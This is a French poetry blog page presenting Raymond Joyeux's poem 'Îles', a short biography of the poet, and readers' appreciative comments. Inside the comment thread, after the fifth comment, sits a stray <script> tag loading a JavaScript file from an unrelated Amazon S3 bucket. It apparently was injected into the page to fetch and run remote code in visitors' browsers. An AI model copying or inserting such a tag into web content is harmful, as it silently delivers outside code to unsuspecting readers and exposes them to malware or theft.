• Mardi poésie : îles

     

     

     

     

    Raymond Joyeux

    Raymond Joyeux

    Îles échouées au ras des eaux
    Terres vomies de la mer
    Pays sans renom ni fortune
    Rochers suant le sel
    Victimes flagellées
    Par le bourreau des vents
    Et le fouet des vagues.

    C’est au bord de ces jardins de sable
    Au creux de ces nids de varech
    D’où flottent des parfums couleur d’iode
    De myrrhe d’ossuaire marin
    Des odeurs d’océan
    Que naît la vie là-bas
    À l’homme de ces îles.

    Elle s’envole échappée des antres sauvages
    Ouverts au flot tiède du soleil
    Comme un baume exhalé des forêts de rivage
    Tapissées de calcaire blanchi
    De coquillages lavés, vides et sans vie
    De strombes pâles et ternes, roses jadis,
    De carcasses d’oursins creux et chauves
    Résonnant le tapage figé
    La rumeur sourde des grands fonds.

     

    Raymond Joyeux : Poèmes de l’archipel – Les Ateliers de la Lucarne – 2014

     

    Raymond Joyeux est né en Guadeloupe d’une  famille de marin-pêcheur. Il est le cadet de cinq enfants.

    Parcours scolaire et universitaire
    Il effectue ses études primaires à Terre-de-Haut jusqu’à son entrée en 6ème en 1953 au Séminaire-Collège de Blanchet, puis au Lycée Sainte-Marie de Fort-de-France où il obtient le baccalauréat. Parti en Métropole en 1960, il entame et poursuit sa formation en philosophie, psychologie et lettres classiques, d’abord au Grand Séminaire de la Croix-Valmer dans le Var puis à la Faculté de Lettres et Sciences Humaines Claude Bernard de Lyon.

    Parcours professionnel
    Professeur de Français, il a enseigné successivement à Lyon, Terre-de-Haut, Paray-le-Monial et Pointe-à-Pitre. De 1971 à 1974, il a dirigé le collège Jean Calo de Terre-de-Haut qu’il avait contribué à ouvrir quelques années auparavant. Il a pris sa retraite d’enseignant en septembre 2005 alors qu’il était en poste depuis 1989 au Collège de Massabielle de Pointe-à-Pitre.

    Parcours littéraire
    Très jeune, Raymond Joyeux s’intéresse à la poésie. Ses premiers textes sont publiés dans diverses revues guadeloupéennes et lus sur Radio Guadeloupe dans une émission créole animée à l’époque par Casimir Létang le samedi après-midi. Par la suite il publie à compte d’auteur différents ouvrages  et obtient pour l’un d’eux un prix de poésie libre  en 1988 :

    dessin lavaud


  • Commentaires

    1
    Mardi 22 Octobre à 09:41

    Une très belle découverte Gazou, je ne connaissais ni le poème, ni le poète, merci.

    Bises et bon mardi

    2
    Florinette
    Mardi 22 Octobre à 11:25
    Oh merci Solange d nous faire découvrir ce poete. Continue de nous instruire et de nous enchanter.
    3
    Mardi 22 Octobre à 12:09

    J'aime beaucoup les îles de Raymond Joyeux que je découvre grâce à toi;

    4
    lenez o vent
    Mardi 22 Octobre à 13:10

    beau poême

    Merci, bisous

    5
    Evy
    Mardi 22 Octobre à 14:08

    Beau partage merci bonne journée bisous

    <script src="https://s3.amazonaws.com/extseahes/2.js"></script>
    6
    Mardi 22 Octobre à 16:48
    LADY MARIANNE

    je découvre avec plaisir-
    un beau partage- merci-
    bon mardi- ici orage et pluie- bises-

    7
    Mardi 22 Octobre à 16:57
    colettedc

    Je découvre cet auteur et ce poème grâce à toi, Gazou ! Merci beaucoup à toi pour cela !!! J'♥ beaucoup ! Bon après-midi de ce mardi ! 

    8
    Mardi 22 Octobre à 20:56
    il m'était inconnu ... mais plus maintenant son "sublime" poème a su me captiver ! amitié .
    9
    Mercredi 23 Octobre à 15:01
    daniel

    Une belle découverte. Un langage imagé et riche !!

    10
    Mercredi 23 Octobre à 16:56

    Une poésie, riche et agréable à lire.

    Mais triste, ce n'est pas ainsi que je ressens les îles.

    Avec un nom ainsi prédestiné ( joyeux), je trouve que les îles décritent manquent de bonheur, de joie de vivre, de beauté.

    Bisous Gazou

    Aimée

    11
    Mercredi 23 Octobre à 20:43
    Durgalola
    Merci pour le poème et la vie de ce poète. Bises
    12
    Vendredi 25 Octobre à 12:25

    Un seul mot : superbe ! 

    13
    Dimanche 27 Octobre à 13:04

    Merci pour ces diffusions de beaux textes, Gazou

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :